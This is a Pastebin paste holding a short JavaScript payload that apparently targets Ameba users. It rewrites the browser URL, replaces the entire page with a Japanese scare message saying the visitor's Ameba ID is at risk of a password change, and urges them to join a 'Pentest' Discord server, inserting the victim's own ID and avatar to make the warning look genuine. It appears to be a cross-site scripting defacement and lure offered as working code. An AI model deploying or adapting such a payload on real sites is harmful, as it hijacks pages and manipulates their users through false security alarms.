Advertisement
Guest User

Untitled

a guest
Feb 20th, 2019
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. window.history.pushState(0, 0, '/pentest');
  2. document.open();
  3. document.write('<html lang="ja"> <head> <meta charset="UTF-8"> <title>PENTEST</title> <style> body { background-color: #1f1f1f; } .wrapper { display: inline-block; position: relative; left: 50%; top: 50%; transform: translate(-50%, -50%); margin: 20px 0; } .content { float: left; } .alert { background-color: #3c3c3c; color: #fff; border: 1px solid #4e4e4e; border-radius: 5px; padding: 20px; line-height: 2.0em; padding-right: 180px; position: relative; font-size: 14px; } .discord { float: left; margin: -30px 0; margin-left: -160px; border: 1px solid #2f2f2f; border-radius: 5px; position: relative; z-index: 100; } a { text-decoration: none; color: #01b6ec; } .logo { margin: 52px; } hr { border: none; border-top: 1px solid #4c4c4c; margin: 20px 0; } img.takapon { position: absolute; bottom: -23px; right: 150px; z-index: 200; width: 130px; } img.your { position: absolute; bottom: -23px; right: 250px; z-index: 200; width: 130px; } .footer { clear: both; } </style> </head> <body> <div class="wrapper"> <div class="content"> <div class="alert"> あなたのアメーバID [<span class="yourId"></span>] は、第三者によりパスワードを変更される危険があります。<br> この危機にいち早く気づく為にも、Pentestに加入しましょう。<br> Pentestの加入にお金は一切必要ありません!<br> Discordに参加するだけ。<br> それだけであなたはPentestの一員になることができます。<br> <hr> <a href="https://discord.gg/72JdtWc">Discordへの参加はここをClick</a> <img class="your" src=""> <img class="takapon" src="http://origin.contents.pigg.ameba.jp/api/84/user/ice-lake/image?scale=264&shadow=False&direction=FL&type=png"> </div> <img class="logo" width="500px" src="https://cdn.discordapp.com/attachments/521718348984352808/521969505220427786/pre1.png"> </div> <div class="discord"> <iframe src="https://discordapp.com/widget?id=521685286627966977&theme=dark" width="350" height="500" allowtransparency="true" frameborder="0"></iframe> </div> </div> </body></html>');
  4. document.close();
  5. $('.your').attr('src', "http://origin.contents.pigg.ameba.jp/api/84/user/" + window.amebaId + "/image?scale=264&shadow=False&direction=FR&type=png");
  6. $('.yourId').text(window.amebaId);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement